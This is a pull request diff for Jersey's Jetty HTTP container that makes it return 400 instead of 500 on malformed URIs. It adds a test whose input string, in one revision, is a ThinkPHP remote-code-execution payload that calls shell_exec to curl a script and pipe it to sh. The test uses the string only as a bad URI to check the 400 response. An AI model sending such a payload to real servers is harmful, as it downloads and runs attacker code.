### PR TITLE
handle URISyntaxException in JettyHttpContainer

### DIFF
--- a/containers/jetty-http/pom.xml
+++ b/containers/jetty-http/pom.xml
@@ -17,7 +17,8 @@
 
 -->
 
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
     <parent>
@@ -37,7 +38,6 @@
             <groupId>org.glassfish.hk2.external</groupId>
             <artifactId>jakarta.inject</artifactId>
         </dependency>
-
         <dependency>
             <groupId>org.eclipse.jetty</groupId>
             <artifactId>jetty-server</artifactId>
@@ -49,6 +49,11 @@
         <dependency>
             <groupId>org.eclipse.jetty</groupId>
             <artifactId>jetty-continuation</artifactId>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>httpclient</artifactId>
+            <scope>test</scope>
         </dependency>
     </dependencies>
 
@@ -69,7 +74,6 @@
                 <artifactId>maven-bundle-plugin</artifactId>
                 <inherited>true</inherited>
             </plugin>
-
         </plugins>
 
         <resources>

--- a/containers/jetty-http/pom.xml
+++ b/containers/jetty-http/pom.xml
@@ -17,8 +17,7 @@
 
 -->
 
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
     <parent>

--- a/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
+++ b/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
@@ -33,6 +33,7 @@ import java.util.logging.Logger;
 
 import javax.ws.rs.core.Application;
 import javax.ws.rs.core.GenericType;
+import javax.ws.rs.core.Response.Status;
 import javax.ws.rs.core.SecurityContext;
 
 import javax.inject.Inject;
@@ -81,8 +82,8 @@ public final class JettyHttpContainer extends AbstractHandler implements Contain
     private static final Type REQUEST_TYPE = (new GenericType<Ref<Request>>() {}).getType();
     private static final Type RESPONSE_TYPE = (new GenericType<Ref<Response>>() {}).getType();
 
-    private static final int INTERNAL_SERVER_ERROR = javax.ws.rs.core.Response.Status.INTERNAL_SERVER_ERROR.getStatusCode();
-    private static final javax.ws.rs.core.Response.Status BAD_REQUEST_STATUS = javax.ws.rs.core.Response.Status.BAD_REQUEST;
+    private static final int INTERNAL_SERVER_ERROR = Status.INTERNAL_SERVER_ERROR.getStatusCode();
+    private static final Status BAD_REQUEST_STATUS = Status.BAD_REQUEST;
 
     /**
      * Cached value of configuration property

--- a/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
+++ b/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
@@ -82,6 +82,7 @@ public final class JettyHttpContainer extends AbstractHandler implements Contain
     private static final Type RESPONSE_TYPE = (new GenericType<Ref<Response>>() {}).getType();
 
     private static final int INTERNAL_SERVER_ERROR = javax.ws.rs.core.Response.Status.INTERNAL_SERVER_ERROR.getStatusCode();
+    private static final javax.ws.rs.core.Response.Status BAD_REQUEST_STATUS = javax.ws.rs.core.Response.Status.BAD_REQUEST;
 
     /**
      * Cached value of configuration property
@@ -193,13 +194,12 @@ public final class JettyHttpContainer extends AbstractHandler implements Contain
     private void setResponseForInvalidUri(final HttpServletResponse response, final Throwable throwable) throws IOException {
         LOGGER.log(Level.FINER, "Error while processing request.", throwable);
 
-        final javax.ws.rs.core.Response.Status badRequest = javax.ws.rs.core.Response.Status.BAD_REQUEST;
         if (configSetStatusOverSendError) {
             response.reset();
             //noinspection deprecation
-            response.setStatus(badRequest.getStatusCode(), badRequest.getReasonPhrase());
+            response.setStatus(BAD_REQUEST_STATUS.getStatusCode(), BAD_REQUEST_STATUS.getReasonPhrase());
         } else {
-            response.sendError(badRequest.getStatusCode(), badRequest.getReasonPhrase());
+            response.sendError(BAD_REQUEST_STATUS.getStatusCode(), BAD_REQUEST_STATUS.getReasonPhrase());
         }
     }
 

--- a/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
+++ b/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
@@ -54,7 +54,9 @@ public class ExceptionTest extends AbstractJettyServerTester {
     public void test400StatusCodeForIllegalSymbolsInURI() throws IOException {
         startServer(ExceptionResource.class);
         URI testUri = getUri().build();
-        String incorrectFragment = "&params[0]=test_status";
+        String incorrectFragment = "/v1/abcdefgh/abcde/abcdef/abc/a/%3Fs=/Index/\\x5Cthink\\x5Capp/invokefunction"
+                + "&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0"
+                + ".0.1/ldr.sh|sh";
         BasicHttpRequest request = new BasicHttpRequest("GET", testUri + incorrectFragment);
         CloseableHttpClient client = HttpClientBuilder.create().build();
 

--- a/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
+++ b/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2010, 2018 Oracle and/or its affiliates. All rights reserved.
+ * Copyright (c) 2010, 2021 Oracle and/or its affiliates. All rights reserved.
  *
  * This program and the accompanying materials are made available under the
  * terms of the Eclipse Public License v. 2.0, which is available at
@@ -16,6 +16,11 @@
 
 package org.glassfish.jersey.jetty;
 
+import org.apache.http.HttpHost;
+import org.apache.http.client.methods.CloseableHttpResponse;
+import org.apache.http.impl.client.CloseableHttpClient;
+import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.message.BasicHttpRequest;
 import org.junit.Test;
 
 import javax.ws.rs.GET;
@@ -28,6 +33,7 @@ import javax.ws.rs.client.WebTarget;
 import javax.ws.rs.core.Response;
 
 import java.io.IOException;
+import java.net.URI;
 
 import static org.junit.Assert.assertEquals;
 
@@ -42,6 +48,19 @@ public class ExceptionTest extends AbstractJettyServerTester {
             throw new WebApplicationException(status);
         }
 
+    }
+
+    @Test
+    public void test400StatusCodeForIllegalSymbolsInURI() throws IOException {
+        startServer(ExceptionResource.class);
+        URI testUri = getUri().build();
+        String incorrectFragment = "&params[0]=test_status";
+        BasicHttpRequest request = new BasicHttpRequest("GET", testUri + incorrectFragment);
+        CloseableHttpClient client = HttpClientBuilder.create().build();
+
+        CloseableHttpResponse response = client.execute(new HttpHost(testUri.getHost(), testUri.getPort()), request);
+
+        assertEquals(400, response.getStatusLine().getStatusCode());
     }
 
     @Test


### PR DESCRIPTION
handle URISyntaxException in JettyHttpContainer to return 400 code instead 500 code
fixes #4748 